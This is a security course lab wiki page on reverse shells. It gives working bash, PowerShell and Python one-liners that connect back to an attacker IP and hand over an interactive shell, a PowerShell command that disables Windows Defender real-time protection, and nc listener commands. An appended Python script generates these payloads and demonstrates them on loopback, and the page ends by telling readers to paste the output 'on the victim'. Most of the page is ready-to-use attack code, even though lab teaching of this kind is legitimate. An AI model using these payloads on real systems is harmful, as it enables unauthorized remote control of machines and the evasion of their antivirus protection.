Lab 8.2: Reverse Shell - Paiet/SEC-335 GitHub Wiki
Bash Reverse Shell
- Command (run on the target; replace AttackerIP and PORT with the address and port your listener is on). It relies on bash's built-in /dev/tcp pseudo-device, so it must be run under bash, not sh or dash:
/bin/bash -i >& /dev/tcp/AttackerIP/PORT 0>&1
- To test this, first open a listening port on your Kali (attacker) machine with the following command:
nc -nvl -p 4449
- Once the listener is up, run the first command on the attacked machine (with PORT set to 4449, the port nc is listening on) and you will have a reverse shell.
Disable Windows Defender through PowerShell
- Run this in an elevated (Administrator) PowerShell session. It turns off real-time protection only; if Tamper Protection is enabled, the change is not applied and Tamper Protection has to be switched off in the Windows Security app first. Confirm the result with Get-MpComputerStatus, where RealTimeProtectionEnabled should now read False:
Set-MpPreference -DisableRealTimeMonitoring $true
Windows Reverse Shell
- Once Defender is disabled, type cmd.exe in the PowerShell window to drop into a cmd shell and run the following there. Launching it from cmd.exe matters: if the line is pasted directly into PowerShell, the outer shell expands $client, $stream and the other variables inside the double-quoted string before the inner powershell process ever sees them.
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKERIP',ATTACKERPORT); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
- Remember to change 'ATTACKERIP' and 'ATTACKERPORT' in the code above before executing, and start a listener on that port on the attacker machine (for example with nc -nvl -p ATTACKERPORT) before running it.
Python Reverse Shell
- This one-liner is Python 3, not PHP. It connects a socket to the attacker, points file descriptors 0, 1 and 2 (stdin, stdout, stderr) at that socket with dup2, and then starts an interactive bash that inherits them, so the shell's input and output travel over the connection. Replace 10.0.5.58 and 4444 with your attacker IP and listening port before running it:
python3 -c 'import socket; from subprocess import run; from os import dup2;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.5.58",4444)); dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);run(["/bin/bash","-i"]);'
[Source](https://www.linuxfordevices.com/tutorials/shell-script/reverse-shell-in-python)
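As an added example (not part of the original lab page), the following Python script shows the whole exchange that the Bash and Python sections above describe, entirely on loopback: it builds the bash /dev/tcp one-liner and the Python dup2 one-liner from an address and port (with a validity check, so a leftover placeholder such as AttackerIP is rejected instead of silently producing a broken command), stands up a listener in place of nc, launches the Python payload against it as a local "target", sends one command followed by exit, and returns what the shell wrote back. The ephemeral listener port, the REVSHELL_OK marker, and the fallback to /bin/sh when /bin/bash is absent are choices made here, not something the page specifies.

```python
"""
Offline, end-to-end demonstration of the reverse shell pattern on this page:
an attacker-side listener (standing in for `nc -nvl -p PORT`) and a
target-side process that wires stdin/stdout/stderr to a TCP socket with
dup2() and hands them to an interactive shell. Everything stays on 127.0.0.1.
"""
import ipaddress
import os
import socket
import subprocess
import sys


def is_valid_target(ip, port):
    """True if ip is an IPv4 literal and port is an int in 1..65535.

    Catches unreplaced placeholders like 'AttackerIP' before they are used.
    """
    try:
        ipaddress.IPv4Address(ip)
    except ValueError:
        return False
    return isinstance(port, int) and 1 <= port <= 65535


def build_bash_payload(ip, port):
    """The bash /dev/tcp one-liner from the page with the placeholders filled in."""
    if not is_valid_target(ip, port):
        raise ValueError(f"bad target {ip}:{port}")
    return f"/bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1"


def build_python_payload(ip, port, shell="/bin/bash"):
    """The socket+dup2 Python reverse shell, parameterised on address and shell."""
    if not is_valid_target(ip, port):
        raise ValueError(f"bad target {ip}:{port}")
    return (
        "import socket,subprocess,os;"
        "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
        f"s.connect(({ip!r},{port}));"
        # after these three calls fds 0,1,2 all refer to the socket, so the
        # shell started next reads commands from and writes output to the connection
        "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
        f"subprocess.run([{shell!r},'-i'])"
    )


def run_exchange(command="echo REVSHELL_OK", timeout=15):
    """Attacker side: listen on an ephemeral loopback port, start a local
    'target' running the Python payload against it, send `command` plus
    `exit`, and return everything the shell sent back (prompts included)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    listener.listen(1)
    listener.settimeout(timeout)
    port = listener.getsockname()[1]

    # assumption: fall back to /bin/sh on systems without bash
    shell = "/bin/bash" if os.path.exists("/bin/bash") else "/bin/sh"
    target = subprocess.Popen(
        [sys.executable, "-c", build_python_payload("127.0.0.1", port, shell)],
        stdin=subprocess.DEVNULL, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
    )
    chunks = []
    try:
        conn, _ = listener.accept()  # the target connects back to us
        conn.settimeout(timeout)
        conn.sendall((command + "\nexit\n").encode())
        while True:
            try:
                chunk = conn.recv(4096)
            except socket.timeout:
                break
            if not chunk:  # shell exited, target closed its end
                break
            chunks.append(chunk)
        conn.close()
    finally:
        listener.close()
        try:
            target.wait(timeout=timeout)
        except subprocess.TimeoutExpired:
            target.kill()
    return b"".join(chunks).decode(errors="replace")


if __name__ == "__main__":
    print(build_bash_payload("10.0.5.58", 4449))
    print(build_python_payload("10.0.5.58", 4444))
    print(run_exchange())
```

Against a real target you would only use the two build_* helpers (paste their output on the victim) and keep nc as the listener; run_exchange exists to show, in one process, what nc sees when the shell connects back and why the output contains the shell's prompt and warnings as well as the command result.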